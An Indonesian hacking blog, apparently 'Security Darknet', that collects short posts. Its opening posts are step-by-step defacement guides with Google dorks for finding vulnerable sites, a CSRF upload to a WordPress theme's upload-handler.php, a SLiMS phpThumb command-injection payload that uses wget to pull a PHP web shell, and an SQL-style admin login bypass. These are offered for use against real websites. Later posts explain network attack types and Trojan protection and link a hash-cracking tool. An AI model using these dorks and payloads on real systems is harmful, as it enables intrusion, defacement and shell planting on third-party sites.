Welcome To Security Darknet

Selamat Datang Di Official Security Darknet

Selasa, 27 Oktober 2020

Deface WordPress Orange Themes

 


Deface WordPress Orange Themes


Dork : 

- inurl:/wp-content/themes/kernel-theme

- inurl:/wp-content/themes/bordeaux-theme

- inurl:/wp-content/themes/bulteno-theme

- inurl:/wp-content/themes/rayoflight-theme


Exploit :

/functions/upload-handler.php


Crsf Online :

https://blogpongo.com/csrf.php


Kalian Dorking Dulu di google

Pilih Salah Satu Web/Target Tambahin Exploitnya

Vuln?= Ada bacaan Error


Lalu Kalian Bukan Csrfnya

Masukkan Url

Contoh :

https://sitetarget.com/wp-content/themes/kernel-theme/functions/upload-handler.php

Post File : orange_themes


Kemudian Klik Submit Nah Terus Upload Shell/Sc Lu Kalo Sukses Nanti Keluar Nama File Kalian


Location File?:/wp-content/uploads/[tahun]/[bulan]/file lu

contoh :

https://sitetarget.com/wp-content/uploads/2020/02/sht.html


contact : ncdream72@gmail.com

Slims command injection Upload Shell



Slims command injection Upload Shell

Google Dorks :
- inurl:/index.php?p=show_detail&id= 
- "Detail Cantuman" site:ac.id 
- "Powered By Slims7" site:ac.id

Payload:
/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php;%20&phpThumbDebug=9

taruh payload dimana om?
terget.com/payload
target.com/path/payload

Akses Shell:
https/target.com/lib/watermark/mini.php

contact me :ncdream72@gmail.com

sumber:

SuperStoreFinder Wordpress Plugins Arbitrary File Upload

 


SuperStoreFinder Wordpress Plugins Arbitrary File Upload


Dork:

- SuperStoreFinder

- Inurl:superstorefinder-wp

- Inurl:superlogoshowcase-wp


SuperStoreFinder Exploit Upload Shell

https://pastebin.com/raw/pMuFWLLm

Usage:python filename.py http://google.com


Ref:

https://packetstormsecurity.com/files/159627/

Kocak Rdnm


still don't get it?

https://youtu.be/sPEJz6KvDbs


Contact : ncdream72@gmail.com

Rabu, 29 Juli 2020

Matrimonial Auth Bypass Admin Vulnerability

Matrimonial Auth Bypass Admin Vulnerability 

{+}Dork : inurl:"printprofile.php?id="

{+}U/p : '=''or'

• Dorking dulu webnya di google atau search engine lain
• Lalu kasi /admin/ contoh www.site.com/admin/

Tinggal Login dengan u/p diatas
Stelah login kalian klick web setting

Maka akan muncul tampilan seperti dibawah ini

Tinggal Lu edit2 kalo ga di jso aja.
Nyari tempat buat upshell? Cari sendiri jangan manja.

Sabtu, 22 Februari 2020

Mengenal Berbagai Jenis Serangan Pada Jaringan Komputer


Dengan berkembangnya teknologi keamanan jaringan ternyata tidak bisa menjamin sepenuhnya untuk melindungi sistem anda dari serangan attacker. Berbagai cara akan dilakukan attacker untuk dapat mengganggu sistem anda, seperti dengan cara membanjiri trafik pada jaringan sehingga dapat menghabiskan resource pada server anda dan server anda tidak bisa menjalankan fungsinya dengan baik.

Berikut adalah jenis-jenis serangan pada jaringan komputer yang biasa dilakukan oleh attacker

1. Spoofing
Teknik serangan yang dilakukan attacker dengan cara memalsukan data sehingga attacker dapat terlihat seperti host yang dapat dipercaya. Terdapat 3 jenis spoofing

IP spoofing adalah teknik yang digunakan dengan cara memalsukan source IP address sehingga ip address aslinya tidak dapat dilacak ketika pengiriman paket
DNS Spoofing adalah teknik yang digunakan untuk mengambil alih DNS server sehingga DNS dan IP address sebuah situs akan dialihkan ke server sang pelaku
Identity Spoofing adalah teknik penyusupan menggunakan identitas secara resmi untuk mengakses segala sesuatu dalam jaringan secara ilegal

2. DDoS (Distributed Denial of Service)
DOS (Denial of Service)
Merupakan jenis serangan terhadap server pada suatu jaringan dengan metode menghabiskan resource yang dimiliki server sampai server tersebut tidak dapat menjalankan fungsinya untuk memberikan akses layananya. Ada beberapa cara yang biasanya dilakukan attacker yaitu

Dengan cara membanjiri trafik dengan banyak data sehingga data dari host yang terdaftar tidak dapat masuk kedalam sistem
Dengan cara membanjiri trafik dengan banyaknya request terhadap server sehingga request dari host yang terdaftar tidak dapat dilayani oleh server
Mengganggu komunikasi antara server dengan host yang terdaftar dengan berbagai cara seperti salah satunya bisa dengan mengubah informasi konfigurasi sistem
DDOS (Distributed Denial of Service)
merupakan jenis serangan DOS yang menggunakan banyak host sekaligus untuk menyerang satu server sehingga dapat mengakibatkan server tidak dapat berfungsi bagi klien.

3. Packet Sniffing
Paket Sniffing merupakan teknik pencurian data dengan cara memonitoring dan menganalisis setiap paket data yang ditransmisikan dari klien ke server. biasanya attacker melakukan serangan ini menggunakan tools wireshark dan netcut untuk mencuri password dan pengambilan data-data penting lainya. Berikut merupakan tahap-tahap cara kerja paket sniffing

Collecting -> merubah interface yang digunakan menjadi promicius code dan kemudian mengelompokan paket data yang lewat melalui jaringan dalam bentuk raw binary

Conversion -> mengkonveriskan data binary kedalam data yang mudah dibaca/dipahami

Analysis -> setelah itu data diklasifikasikan kedalam blok protokol sesuai dengan sumber data tersebut
Pencurian Data-> Setelah data dikasifikasikan, maka attacker dapat mencuri datanya

4. DNS Poisoning
Merupakan Jenis serangan dengan cara memberikan informasi IP address yang palsu untuk mengalihkan trafik pada paket data dari tujuan yang sebenarnya. biasanya cara ini dipakai attacker untuk menyerang situs-situs ecommerce dan banking. attacker juga dapat membuat server palsu yang memiliki tampilan yang sama dengan situ yg sebenarnya. oleh karena itu diperlukan adanya digital certificate untuk mengamankanya agar server palsu tersebut dapat dibedakan dengan server aslinya yang memiliki digital certificate

5. Trojan Horse
Merupakan salah satu jenis Malicious software/malware yang dapat merusak sebuah sistem. Trojan ini dapat digunakan untuk memperoleh informasi dari target seperti password, system log dll, dan dapat memperoleh hak akses dari target. Trojan merupakan software yang berbeda dengan virus atau worm karena trojan ini bersifat stealth dalam beroperasi dan seolah-olah seperti program biasa yang tidak mencurigakan dan trojan juga bisa dikendalikan dari komputer lain (attacker). ada beberapa jenis trojan dan 3 diantaranya yaitu:

Pencuri Password -> jenis trojan ini dapat mencuri password yang disimpan didalam sistem dengan cara membuat tampilan seolah-olah tampilan login dengan menunggu host memasukan passwordnya pada saat login kemudian password tersebut akan dikirimkan ke attacker

Keylogger -> Jenis Trojan akan merekam semua yang diketikan oleh host dan mengirimkanya ke attacker.

RAT (Remote Administration Tools)-> Jenis trojan ini mampu mengambil alih kontrol secara penuh terhadap sistem dan dapat melakukan apapun yang attacker mau dari jarak jauh seperti memformat hardisk, mengedit dan menghapus data dll

6. SQL Injection
Sebuah Teknik serangan yang memanfaatkan celah keamanan dimana website mengijinkan user untuk menginput data tetapi tanpa adanya filter terhadap malicious character sehingga attacker bisa mendapatkan akses kedalam basis data sebuah aplikasi. inputan tersebut biasanya dimasukan kedalam bagian-bagian tertentu pada website yang berhubungan dengan database dari situs tersebut. attacker biasanya memasukan data link yang mengarahkan korban menuju website yang digunakan attacker untuk mengambil informasi/data pribadi dari korban.

Demikian sekilas tentang berbagai macam jenis serangan yang ada pada jaringan komputer, Semoga bermanfaat.

Source: netsec.id

Referensi:

SQL_injection - Wiki

DNS_spoofing - Wiki

Trojan_Horse - Wiki



Selasa, 20 Agustus 2019

CARA DECRYPT HASH




Hallo, teman - teman semua. Disini saya akan membagikan sebuah Tools ( Alat ) yang dapat digunakan untuk men-Decrypt sebuah Hash / Enkripsi. Enkripsi adalah proses mengamankan suatu informasi dengan membuat informasi tersebut tidak dapat dibaca tanpa bantuan pengetahuan khusus.

Nah, disini saya akan memberikan sebuah Tools gratis buatan saya (No Recode Boojanx). Tools ini hanya dapat dijalankan di Terminal UNIX, dan Tools ini saya tulis dengan bahasa Python. Jadi untuk dapat menjalankannya kalian harus Install Python terlebih dahulu, Versi python yang dapat digunakan yaitu Python 2.7

Cara Install :
  • Pertama, kalian harus Clone Repository nya dari github saya,
~# git clone https://github.com/kingencryptor/decrypter
  • Setelah file berhasil masuk ke directory kalian, silahkan arahkan terminal ke Directory dari tool decrypter tersebut.
  • Setelah berada di directory, silahkan jalankan file decrypter.pyc dengan menggunakan python 2.7
~# python2 decrypter.pyc
  •  Dan program (tool) akan jalan dan akan memasang Modul - modul yang dibutuhkan secara otomatis.
  • Setelah proses installasi selesai, silahkan buka kembali file tersebut dengan perintah yang sama.
  • Di dalam tool ini terdapat 2 metode untuk memecahkan Enkripsi, yaitu dengan menggunakan Google Search atau menggunakan teknik Bruteforce.
  • Saya sudah menambahkan sebuah Wordlist, disinu saya sebut sebagai keyList, file tersebut akan ada jika kalian memasukkan perintah :
~# python2 decrypter.pyc -u
  • Dan begitulah cara untuk memasang Tools Decrypter, jika kalian masih bingung, saya sudah tambahkan tutorial dalam bentuk video cast, silahkan cek dibawah :-)
Link Asciinema :
  • Tutorial :
https://asciinema.org/a/TUZK3Ocogb43jyuPr9g7JkMAb
  • Demo :
https://asciinema.org/a/8x4OWUoYn3bnUqeOWsXEPa4MS


Nah, itu tadi sedikit Tutorial dari saya (wahyu.py). Jika ada sebuah masalah yang tidak ada penyelesaiannya di tutorial ini, silahkan chat ke Whatsapp. Dan jika mau tanya mengenai masalah Koding kalian, saia siap membantu. ;:'v

Link Whatsapp : https://api.whatsapp.com/send?phone=62895421809222

Bagi yang mau Join Security Darknet, silahkan DM saja Instagram kita di, https://instagram.com/security_darknet

Terimakasih, sudah membaca Tutorial dari Kami, :-)

~Uploader : wahyu.py

Sabtu, 01 Juni 2019

APA ITU TROJAN HORSE ?

Trojan horse atau Kuda Troya atau yang lebih dikenal sebagai Trojan dalam keamanan komputer merujuk kepada sebuah perangkat lunak berbahaya yang dapat merusak sebuah sistem atau jaringan. Tujuan dari Trojan adalah memperoleh informasi dari target (password, kebiasaan user yang tercatat dalam system log, data, dan lain-lain), dan mengendalikan target (memperoleh hak akses pada target).



1. SEJARAH TROJAN HORSE

Trojan horse merupakan patung kuda kayu besar yang diberikan sebagai hadiah kepada kota Troya oleh orang Yunani.
Di dalam patung tersebut bersembunyi tentara Yunani yang kemudian mengalahkan pasukan Troya setelah patung kuda tersebut dibawa masuk melewati gerbang kota.

Dalam istilah komputasi, Trojan horse mengacu pada program berbahaya yang muncul menyamar sebagai sesuatu yang tidak berbahaya, seperti file musik atau video.

2. SERANGAN TROJAN HORSE

Serangan Trojan horse dapat dirancang untuk mencapai berbagai tujuan, tetapi biasanya merupakan tujuan jahat seperti mencuri data atau menyebar kekacauan.

Misalnya, saat Trojan horse menginfeksi komputer, dia akan berusaha mengirim data penting seperti nomer kartu kredit ke pembuatnya.

Akibat paling sering dari serangan Trojan horse adalah melambatnya komputer atau turunnya kecepatan koneksi internet Anda.
Sebanyak apa variasi serangan akan tergantung pada imajinasi pembuat Trojan.

3. PERLINDUNGAN TERHADAP SERANGAN

Kewaspadaan adalah kunci menghindari infeksi. Untuk mencegah serangan Trojan horse, Anda tidak boleh men-download file apapun kecuali berasal dari sumber-sumber terpercaya.

Trojan horse dapat menyamar sebagai semua jenis file, tetapi harus diaktifkan untuk menyebabkan kerusakan pada komputer.

Itu sebab, ekstensi file Trojan umumnya berbentuk seperti .exe, .vbs, .com, atau .bat.

Selalu periksa ekstensi file sebelum membuka file apapun dan jangan pernah membuka file atau mengklik link secara acak.

4. MENGHAPUS TROJAN HORSE

Satu-satunya cara untuk menjamin 100 persen komputer Anda terhindar dari infeksi adalah dengan memformat penuh hard drive dan menginstal kembali sistem operasi yang bersih.
Ini adalah proses melelahkan sekaligus merugikan karena dapat menghapus file penting yang Anda miliki.

Solusi lain yang mungkin adalah dengan menggunakan perangkat lunak anti-virus dan anti-Trojan. Hanya saja variasi Trojan kadang melebihi kecepatan up-date program antivirus. Sangat sulit bagi pengguna komputer untuk mendeteksi dan menghindari semua kemungkinan serangan pada komputer. Selama komputer terhubung ke internet, selalu terdapat kemungkinan menjadi target serangan online seperti worm, virus, atau Trojan horse.

Mengetahui apa itu Trojan horse akan membantu menjaga komputer Anda terhindar dari infeksi.

Bagikan informasi ini jika menurutmu membantu & berguna